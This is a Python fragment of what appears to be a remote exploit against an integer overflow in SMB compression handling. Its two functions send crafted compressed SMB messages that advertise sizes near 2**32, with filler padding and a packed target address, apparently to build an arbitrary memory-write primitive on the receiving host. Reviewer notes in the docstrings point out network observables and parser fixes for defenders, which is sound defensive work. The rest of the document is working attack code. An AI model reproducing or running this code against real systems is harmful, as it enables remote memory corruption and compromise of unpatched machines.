def write_srvnet_buffer_hdr(ip, port, data, offset):
    """Send one compressed SMB message carrying ``data`` behind a filler prefix.

    Steps, in order: open a connection with ``reconnect``, run
    ``smb_negotiate``, read and discard up to 1000 bytes of the reply,
    compress ``data`` with ``compress_evil``, build a filler of 0x33 bytes
    whose length is ``overflow_val + offset``, hand everything to
    ``smb_compress`` and close the socket.

    Args:
        ip: Target address passed to ``reconnect``.
        port: Target port passed to ``reconnect``.
        data: Bytes given to ``compress_evil`` before sending.
        offset: Extra filler length added on top of ``overflow_val``.

    NOTE(review): ``reconnect``, ``smb_negotiate``, ``compress_evil``,
    ``smb_compress`` and ``overflow_val`` are defined outside this block.
    The third ``smb_compress`` argument is presumably the advertised
    original (decompressed) size of the message; confirm against the helper.

    NOTE(review): for defenders, a compressed SMB message advertising a size
    this close to 2**32 is the observable to alert on. A receiver has to
    check the sum of the advertised size and the offset for 32-bit
    wraparound before it allocates or copies.

    NOTE(review): the socket is not closed if any helper raises.
    """
    conn = reconnect(ip, port)
    smb_negotiate(conn)
    # The negotiate reply is read only to drain it; its content is unused.
    conn.recv(1000)

    packed = compress_evil(data)
    filler_len = overflow_val + offset
    filler = b"\x33" * filler_len

    # 0xFFFFEFFF is 0x1000 below the 32-bit maximum.
    smb_compress(conn, packed, 0xFFFFEFFF, filler)
    conn.close()
def write_primitive(ip, port, data, addr):
    """Send one compressed SMB message whose payload ends in a packed address.

    The uncompressed payload is laid out as:

    * ``overflow_val - len(data)`` bytes of 0x41 padding,
    * ``PNET_RAW_BUFF_OFFSET`` zero bytes,
    * ``addr`` packed as a little-endian unsigned 64-bit integer.

    That payload is compressed with ``compress`` and sent through
    ``smb_compress`` together with ``data`` and the size value 0xFFFFFFFF,
    after which the socket is closed.

    Args:
        ip: Target address passed to ``reconnect``.
        port: Target port passed to ``reconnect``.
        data: Bytes passed as the last ``smb_compress`` argument; their
            length shortens the 0x41 padding.
        addr: Integer packed with ``struct.pack('<Q', ...)`` at the end of
            the payload.

    NOTE(review): ``reconnect``, ``smb_negotiate``, ``compress``,
    ``smb_compress``, ``overflow_val`` and ``PNET_RAW_BUFF_OFFSET`` are
    defined outside this block. The names suggest this is the write stage of
    a memory-corruption proof of concept; the receiver-side effect is not
    visible here.

    NOTE(review): for defenders, the observable is a compressed SMB message
    advertising what is presumably an original size of 0xFFFFFFFF (confirm
    against ``smb_compress``). A parser that validates the advertised sizes
    against the real message length, with overflow-safe arithmetic, rejects
    it before any copy.

    NOTE(review): if ``len(data)`` exceeds ``overflow_val`` the padding
    silently becomes empty, and the socket is not closed if a helper raises.
    """
    conn = reconnect(ip, port)
    smb_negotiate(conn)
    # The negotiate reply is read only to drain it; its content is unused.
    conn.recv(1000)

    pad_len = overflow_val - len(data)
    plain = b"".join(
        [
            b"\x41" * pad_len,
            b"\x00" * PNET_RAW_BUFF_OFFSET,
            struct.pack('<Q', addr),
        ]
    )

    packed = compress(plain)
    smb_compress(conn, packed, 0xFFFFFFFF, data)
    conn.close()